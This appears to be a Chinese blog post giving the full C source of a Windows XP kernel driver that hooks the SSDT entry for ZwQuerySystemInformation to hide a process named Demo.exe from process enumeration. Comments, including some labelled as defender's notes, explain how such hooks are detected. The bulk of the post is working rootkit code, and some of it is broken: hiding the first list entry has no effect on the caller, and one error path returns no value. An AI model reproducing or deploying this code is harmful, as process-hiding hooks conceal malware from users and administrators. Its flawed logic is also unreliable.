新版XP下Hook SSDT隐藏进程

原创 2013年12月01日 21:54:14
// 网上的代码里,很多函数都是很早之前的,像什么 MmCreateMdl、MmMapLockedPages 啊,现在早已被废弃。所以想自己写个。蓝了几十次,OMG
// 隐藏名称为Demo.exe的进程
#ifdef __cplusplus
extern "C"
{
#endif

#include <ntddk.h>

#pragma pack(1)
/*
 * Layout this driver assumes for the exported KeServiceDescriptorTable
 * (byte-packed, 32-bit pointers). Only two members are read below:
 * ServiceTableBase is treated as the array of 4-byte service routine
 * addresses, and NumberOfServices sizes the MDL built over it in DriverEntry.
 * NOTE(review): undocumented structure; its layout is OS-version specific.
 */
typedef struct ServiceDescriptorEntry
{
    unsigned int *ServiceTableBase; // service address table, indexed by service number
    unsigned int *ServiceCounterTableBase; //Used only in checked build
    unsigned int NumberOfServices; // entry count; multiplied by 4 in DriverEntry
    unsigned char *ParamTableBase; // not read by this driver
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
#pragma pack()

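/*
 * Driver-local definition of the undocumented SYSTEM_PROCESS_INFORMATION
 * record that ZwQuerySystemInformation returns for information class 5.
 *
 * The hook below reads only two members: NextEntryOffset (byte distance to
 * the next record, 0 on the last one - see the walker in
 * NewZwQuerySystemInformation) and ImageName (compared against the name to
 * hide). The remaining members are presumably listed only so that those two
 * land at the kernel's offsets; the layout is OS-version specific.
 */
typedef struct _SYSTEM_PROCESS_INFORMATION
{
    ULONG NextEntryOffset; // 0 terminates the chain
    ULONG NumberOfThreads;
    LARGE_INTEGER SpareLi1;
    LARGE_INTEGER SpareLi2;
    LARGE_INTEGER SpareLi3;
    LARGE_INTEGER CreateTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER KernelTime;
    UNICODE_STRING ImageName; // compared with L"Demo.exe" by the hook
    KPRIORITY BasePriority;
    HANDLE UniqueProcessId;
    HANDLE InheritedFromUniqueProcessId;
    ULONG HandleCount;
    ULONG SessionId;
    ULONG_PTR PageDirectoryBase;
    SIZE_T PeakVirtualSize;
    SIZE_T VirtualSize;
    ULONG PageFaultCount;
    SIZE_T PeakWorkingSetSize;
    SIZE_T WorkingSetSize;
    SIZE_T QuotaPeakPagedPoolUsage;
    SIZE_T QuotaPagedPoolUsage;
    SIZE_T QuotaPeakNonPagedPoolUsage;
    SIZE_T QuotaNonPagedPoolUsage;
    SIZE_T PagefileUsage;
    SIZE_T PeakPagefileUsage;
    SIZE_T PrivatePageCount;
    LARGE_INTEGER ReadOperationCount;
    LARGE_INTEGER WriteOperationCount;
    LARGE_INTEGER OtherOperationCount;
    LARGE_INTEGER ReadTransferCount;
    LARGE_INTEGER WriteTransferCount;
    LARGE_INTEGER OtherTransferCount;
} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION; // stray second ';' (an empty file-scope declaration) removed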

// Exported by the 32-bit kernel; the struct above is this driver's view of it.
extern ServiceDescriptorTableEntry_t KeServiceDescriptorTable;
// Prototype for the Zw* stub whose SSDT slot is replaced below. Only the stub's
// address is used here: GetSysFuncIndex reads the service number out of it.
NTKERNELAPI NTSTATUS ZwQuerySystemInformation( IN ULONG SystemInformationClass, IN PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength );

// Signature shared by the saved original routine and NewZwQuerySystemInformation.
typedef NTSTATUS( *ZWQUERYSYSTEMINFORMATION )( ULONG SystemInformationCLass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength );
// Original SSDT entry: saved in DriverEntry, called through by the hook,
// restored in DriverUnload.
ZWQUERYSYSTEMINFORMATION OldZwQuerySystemInformation;
// MDL describing the service table, and the system-space view mapped through
// it. Both are created in DriverEntry and released in DriverUnload; the view is
// what HookSysFunc/UnHookSysFunc write through.
PMDL  pMdlSSDT = NULL;
PVOID* pMapSSDT = NULL;

/*
 * Returns the system service number encoded in a Zw* stub.
 *
 * pFunc is the stub's address carried in a 32-bit integer (so this file is
 * x86-only). The 32-bit value immediately after the stub's first opcode byte
 * is read; the author's reference below explains why the service index sits
 * there in the XP stubs. Nothing validates that pFunc really points at such a
 * stub - a wrong address yields a garbage index that is then used to address
 * the service table.
 */
ULONG GetSysFuncIndex( ULONG pFunc )
{
    // Derivation of this offset: http://blog.csdn.net/yjz1409276/article/details/17049417
    return *( PULONG )( ( PUCHAR )pFunc + 1 );
}

/*
 * Reads the current SSDT entry for the service implemented by the stub pFunc.
 *
 * Resolves the service number with GetSysFuncIndex and returns the 4-byte
 * entry at that index as a plain ULONG, without any range check against
 * NumberOfServices. Note that the expression dereferences ServiceTableBase
 * once before indexing, i.e. the index is applied relative to the value held
 * in the table's first slot rather than to ServiceTableBase itself;
 * DriverEntry builds its MDL from the same expression, so the two agree with
 * each other.
 */
ULONG GetSysFuncAddr( ULONG pFunc )
{
    ULONG FuncIndex = GetSysFuncIndex( pFunc );
    return *( ( ( PULONG ) * KeServiceDescriptorTable.ServiceTableBase ) + FuncIndex );
}

/*
 * Replaces one SSDT entry through the writable view in pMapSSDT.
 *
 * pSysFunc: address of the Zw* stub identifying the service (see GetSysFuncIndex).
 * pNewFunc: address written into that service's slot.
 * Returns the previous slot value (the InterlockedExchange result).
 * Requires pMapSSDT to have been set up by DriverEntry. A fault while
 * touching the view is caught by the SEH handler, but that path falls off
 * the end of a non-void function without a return value (UnHookSysFunc
 * returns 0 in the same situation); the caller's result is undefined there.
 */
ULONG HookSysFunc( ULONG pSysFunc, ULONG pNewFunc )
{
    KdPrint( ( "Enter HookSysFunc/n" ) ); // "/n" is printed literally; "\n" was presumably intended
    __try
    {
        // Slot address: view base + service number, 4 bytes per entry.
        PULONG pSysAddr = ( PULONG )( pMapSSDT ) + GetSysFuncIndex( pSysFunc );
        // Single atomic 32-bit exchange; the old value becomes the return value.
        return InterlockedExchange( ( PLONG )pSysAddr , ( ULONG )pNewFunc );
    }
    __except ( EXCEPTION_EXECUTE_HANDLER )
    {
        KdPrint( ( "HookSysFunc Occurred Exception/n" ) );
    }
}

/*
 * Writes pOldFunc back into the SSDT slot of the service identified by pSysFunc.
 *
 * Mirror image of HookSysFunc: same slot computation, same atomic exchange.
 * Returns the value that was in the slot before the write, or 0 if an
 * exception was raised while touching the mapped view.
 */
ULONG UnHookSysFunc( ULONG pSysFunc, ULONG pOldFunc )
{
    KdPrint( ( "Enter UnHookSysFunc/n" ) ); // "/n" is printed literally; "\n" was presumably intended
    __try
    {
        // Slot address: view base + service number, 4 bytes per entry.
        PULONG pSysAddr = ( PULONG )( pMapSSDT ) + GetSysFuncIndex( pSysFunc );
        return InterlockedExchange( ( PLONG )pSysAddr , ( ULONG ) pOldFunc );
    }
    __except ( EXCEPTION_EXECUTE_HANDLER )
    {
        KdPrint( ( "UnHookSysFunc Occurred Exception/n" ) );
    }
    return 0;
}

/*
 * Unload routine: restores the saved original entry, then tears down the
 * MDL mapping created in DriverEntry.
 *
 * Order matters: the slot is restored before the view it was written through
 * is unmapped. The mapping is released only when pMdlSSDT was allocated, and
 * pMapSSDT is assumed to be valid whenever pMdlSSDT is. That assumption holds
 * because DriverEntry returns failure when mapping fails and the I/O manager
 * does not call Unload for a driver whose DriverEntry failed - which also
 * means the MDL leaked on that failure path is never released here.
 */
VOID DriverUnload( IN PDRIVER_OBJECT DriverObject )
{
    KdPrint( ( "Enter DriverUnload/n" ) ); // "/n" is printed literally; "\n" was presumably intended
    
    // Put the original service routine back before releasing the view.
    UnHookSysFunc( ( ULONG )ZwQuerySystemInformation, ( ULONG )OldZwQuerySystemInformation );
    
    if ( NULL != pMdlSSDT )
    {
        MmUnmapLockedPages( pMapSSDT, pMdlSSDT );
        IoFreeMdl( pMdlSSDT );
    }
}

/*
 * Replacement SSDT entry for ZwQuerySystemInformation.
 *
 * Forwards every call to the saved original routine and returns its status
 * unchanged. When the call succeeded and SystemInformationClass is 5
 * (SystemProcessInformation), the returned SYSTEM_PROCESS_INFORMATION chain
 * is walked and records whose ImageName equals L"Demo.exe" (case-sensitive:
 * RtlCompareUnicodeString is called with CaseInSensitive == FALSE) are
 * unlinked by adjusting the previous record's NextEntryOffset; the first
 * record is handled by the separate branch below. ReturnLength and the rest
 * of the caller's buffer are left as the original routine produced them.
 *
 * Defender's notes: this is the classic "unlink from the enumeration" trick.
 * The process still exists, so any view that does not pass through this
 * syscall (kernel object lists, scheduler state, handles held on the process,
 * a live kernel debugger) still shows it, and comparing those views against
 * the syscall's answer is the usual way such a hook is detected. SSDT
 * integrity checks also flag an entry that points outside the kernel image.
 * The KdPrint issued on every call is visible to an attached debugger and is
 * itself a cheap tell.
 */
NTSTATUS NewZwQuerySystemInformation( IN ULONG SystemInformationClass, IN PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength )
{
    KdPrint( ( "Enter NewZwQuerySystemInformation/n" ) ); // "/n" is printed literally; "\n" was presumably intended
    
    NTSTATUS ntStatus; // declared after a statement: needs C99 or a C++ build (the file carries extern "C" guards)
    
    // Always let the real service produce the buffer first.
    ntStatus = ( ( ZWQUERYSYSTEMINFORMATION )( OldZwQuerySystemInformation ) )( SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength );
    
    if ( NT_SUCCESS( ntStatus ) )
    {
        if ( SystemInformationClass == 5 ) // 5 == SystemProcessInformation
        {
            PSYSTEM_PROCESS_INFORMATION curr = ( PSYSTEM_PROCESS_INFORMATION )SystemInformation;
            PSYSTEM_PROCESS_INFORMATION prev = NULL;
            UNICODE_STRING hideName;
            RtlInitUnicodeString( &hideName, L"Demo.exe" );
            // Walk the chain; NextEntryOffset == 0 marks the last record.
            while ( curr )
            {
                if ( curr->ImageName.Buffer != NULL )
                {
                    if ( 0 == RtlCompareUnicodeString( &curr->ImageName, &hideName, FALSE ) )
                    {
                        if ( prev ) // Middle or Last entry
                        {
                            if ( curr->NextEntryOffset )
                                prev->NextEntryOffset += curr->NextEntryOffset;
                            else	// we are last, so make prev the end
                                prev->NextEntryOffset = 0;
                        }
                        else
                        {
                            if ( curr->NextEntryOffset )
                            {
                                // we are first in the list, so move it forward
                                SystemInformation = ( PCHAR )SystemInformation + curr->NextEntryOffset;
                            }
                            else // we are the only process!
                                SystemInformation = NULL;
                        }
                    }
                }
                prev = curr;
                if ( curr->NextEntryOffset )
                    ( curr = ( PSYSTEM_PROCESS_INFORMATION )( ( PCHAR )curr + curr->NextEntryOffset ) );
                else
                    curr = NULL;
            }
        }
    }
    return ntStatus;
}

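/*
 * Catch-all dispatch routine installed for every IRP major function in
 * DriverEntry. Rejects the request with STATUS_NOT_SUPPORTED and completes it.
 *
 * DeviceObject: unused (no IoCreateDevice call is visible in DriverEntry).
 * Irp: the request to complete; it must not be read after IoCompleteRequest,
 *      which is why the status is returned from a local instead of being
 *      re-read from Irp->IoStatus.Status as the original did.
 * Returns STATUS_NOT_SUPPORTED.
 */
NTSTATUS DefaultHandler( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp )
{
    const NTSTATUS status = STATUS_NOT_SUPPORTED;

    KdPrint( ( "Enter DefaultHandler/n" ) );

    Irp->IoStatus.Status = status;
    Irp->IoStatus.Information = 0;
    // Ownership of the IRP passes back to the I/O manager here.
    IoCompleteRequest( Irp, IO_NO_INCREMENT );
    return status;
}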

/*
 * Driver entry point: installs the SSDT hook.
 *
 * 1. Points every IRP major function at DefaultHandler and registers
 *    DriverUnload. No device object is created here, so the dispatch table
 *    is presumably never exercised.
 * 2. Saves the current SSDT entry for ZwQuerySystemInformation.
 * 3. Builds an MDL over the service table (NumberOfServices entries of 4
 *    bytes, i.e. 32-bit only), sets MDL_MAPPED_TO_SYSTEM_VA on it by hand and
 *    maps a second, non-cached system-space view of those pages; that view
 *    (pMapSSDT) is what HookSysFunc/UnHookSysFunc write through.
 * 4. Swaps the entry to NewZwQuerySystemInformation.
 *
 * RegistryPath is unused. Returns STATUS_SUCCESS, or STATUS_UNSUCCESSFUL when
 * the MDL cannot be allocated, the mapping fails, or any exception is raised
 * inside the __try block (the handler is empty, so the cause is not logged).
 * When the mapping fails the already-allocated MDL is not freed before
 * returning, and DriverUnload does not run for a failed DriverEntry.
 *
 * Defender's notes: an MDL built over kernel code/data followed by a write
 * into the service table is exactly what SSDT-integrity and kernel-patch
 * detection look for; on x64, Kernel Patch Protection treats the same write
 * as a fatal system error, which is one reason this technique is confined to
 * 32-bit XP-era systems.
 */
NTSTATUS DriverEntry( IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING  RegistryPath )
{
    KdPrint( ( "Enter DriverEntry/n" ) ); // "/n" is printed literally; "\n" was presumably intended
    
    // Reject every IRP major function; no device object is created below.
    for ( int i = 0; i <= IRP_MJ_MAXIMUM_FUNCTION; i++ )
    {
        DriverObject->MajorFunction[i] = DefaultHandler;
    }
    
    DriverObject->DriverUnload  = DriverUnload;
    
    __try
    {
        // Remember the entry to restore at unload (and to call through from the hook).
        OldZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetSysFuncAddr( ( ULONG )ZwQuerySystemInformation );
        // MDL spanning the whole table: NumberOfServices * 4 bytes (same base
        // expression as GetSysFuncAddr).
        pMdlSSDT = IoAllocateMdl( ( PULONG ) * KeServiceDescriptorTable.ServiceTableBase,
                                  KeServiceDescriptorTable.NumberOfServices * 4, FALSE, FALSE, NULL );
        if ( NULL == pMdlSSDT )
        {
            return STATUS_UNSUCCESSFUL;
        }
        MmBuildMdlForNonPagedPool( pMdlSSDT );
        // Flag set manually rather than by the memory manager.
        pMdlSSDT->MdlFlags |= MDL_MAPPED_TO_SYSTEM_VA;
        pMapSSDT = ( PVOID* )MmMapLockedPagesSpecifyCache( pMdlSSDT, KernelMode, MmNonCached, NULL, FALSE, HighPagePriority );
        if ( NULL == pMapSSDT )
        {
            // pMdlSSDT is still allocated on this path and is not released.
            return STATUS_UNSUCCESSFUL;
        }
        
        // Return value (the previous entry) is ignored here; it was already
        // captured above via GetSysFuncAddr.
        HookSysFunc( ( ULONG )ZwQuerySystemInformation , ( ULONG )NewZwQuerySystemInformation );
        return STATUS_SUCCESS;
    }
    __except ( EXCEPTION_EXECUTE_HANDLER )
    {
    
    }
    return STATUS_UNSUCCESSFUL;
    
}

#ifdef __cplusplus
}
#endif


版权声明:本文为博主原创文章,未经博主允许不得转载。
